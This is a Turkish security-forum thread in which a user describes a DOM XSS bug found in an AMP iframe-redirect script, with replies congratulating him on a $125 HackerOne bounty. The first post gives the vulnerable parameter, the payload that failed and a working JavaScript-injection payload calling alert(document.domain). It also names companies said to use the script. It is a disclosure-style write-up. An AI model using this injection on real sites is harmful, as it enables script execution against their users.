İPUCU

THT Gövde Gösterisi BugBounty & Exploit Çalışmalarınızı Sergileyebileceğiniz Bölüm

Seçenekler

0day DOM XSS Exploit WriteUp

23-01-2019 23:14
#1
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.271
Teşekkür (Etti):
510
Teşekkür (Aldı):
1257
Konular:
312
Merhaba, bu konumda onlarca büyük sitenin kullandığı bir script'te bulduğum bir dom xss'i anlatacağım.

Normal site url'si:
Kod:
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0
Kaynak Kod:

Tabii ki ilk olarak
Kod:
</script><script>alert(1)</script>
kodunu denedim, ancak özel karakterler için aldığım sonuç;


Daha sonra javascript injection denedim, alert'i almak için uygun kodu yazdım:
Kod:
); alert(docu ment.domain); if (1
Ardından sitede denemek kaldı. Url:
Kod:
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(docu ment.domain); if (1
Aldığım sonuç;


Bu script'i kullanan bazı firmalar;
  1. Shopify
  2. Canva
  3. Yelp
  4. Western Union
  5. Cuvva vb.

Ödül: 125$

[EN]
0day DOM XSS Exploit WriteUp
Konu MyGf tarafından (23-01-2019 23:19 Saat 23:19 ) değiştirilmiştir.

23-01-2019 23:17
#2
Üyelik tarihi:
01/2019
Mesajlar:
6
Teşekkür (Etti):
1
Teşekkür (Aldı):
3
Konular:
1
Ellerinize sağlık hocam ne kadar değerli insanlarsınız. İyi ki forumdasınız.
Kullanıcı İmzası
Bir kulaç daha atsam karadayım,
Ben hiç böyle bir denize dalmadım,
Üzerimde pantolonum artı ayakkabılarım,
Ha gayret!
Bir sürü fırtına üzerimde dolunay,
Gün yüzü asmış, dalgalar boyum aşmış,
Nefesime gücü bahşet Mevlâ,
Bir kulaç daha atsam olur evelallah.
23-01-2019 23:18
#3
Lawliet123 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2016
Mesajlar:
2.563
Teşekkür (Etti):
464
Teşekkür (Aldı):
706
Konular:
143
Ellerine sağlık, çok başarılı.

Bildirip parayı aldın mı?
Kullanıcı İmzası
Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

23-01-2019 23:20
#4
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.271
Teşekkür (Etti):
510
Teşekkür (Aldı):
1257
Konular:
312
Alıntı:
BirKulacAtsam´isimli üyeden Alıntı Mesajı göster
Ellerinize sağlık hocam ne kadar değerli insanlarsınız. İyi ki forumdasınız.
Teşekkürler.

Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık, çok başarılı.
Bildirip parayı aldın mı?
Neden almayayım ki
23-01-2019 23:24
#5
Lawliet123 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2016
Mesajlar:
2.563
Teşekkür (Etti):
464
Teşekkür (Aldı):
706
Konular:
143
Alıntı:
MyGf´isimli üyeden Alıntı Mesajı göster
Teşekkürler.


Neden almayayım ki

OJEWIGHQEGJQIETHJQE


Yok yahu al, al tabi, ben sadece kim verdi ve nereye verdi diye sorucaktım OIJEIGJWQEITHJQIETHJQOEIJHQWETJHQWETH "Neden almayayım ki"
Kullanıcı İmzası
Anladıktan sonra, hiçbir şey ilginç gelmez.
▓██▓
▓██▒
▒██░
▒██░ awliet123
░██████▒
░ ▒░▓ ░
░ ░ ▒ ░
░ ░

23-01-2019 23:31
#6
atmaca7887 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2017
Nereden:
-
Mesajlar:
2.294
Teşekkür (Etti):
288
Teşekkür (Aldı):
354
Konular:
128
Köşeyi dönmüşsün yine
23-01-2019 23:42
#7
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.271
Teşekkür (Etti):
510
Teşekkür (Aldı):
1257
Konular:
312
Alıntı:
atmaca7887´isimli üyeden Alıntı Mesajı göster
Köşeyi dönmüşsün yine
Yaptık bir şeyler

Alıntı:
Lawliet123´isimli üyeden Alıntı Mesajı göster
.
hackerone'de private programı olan bir firma'dan aldım
Lawliet123 Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var
Sizin Konu Yanıtlama Yetkiniz var
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı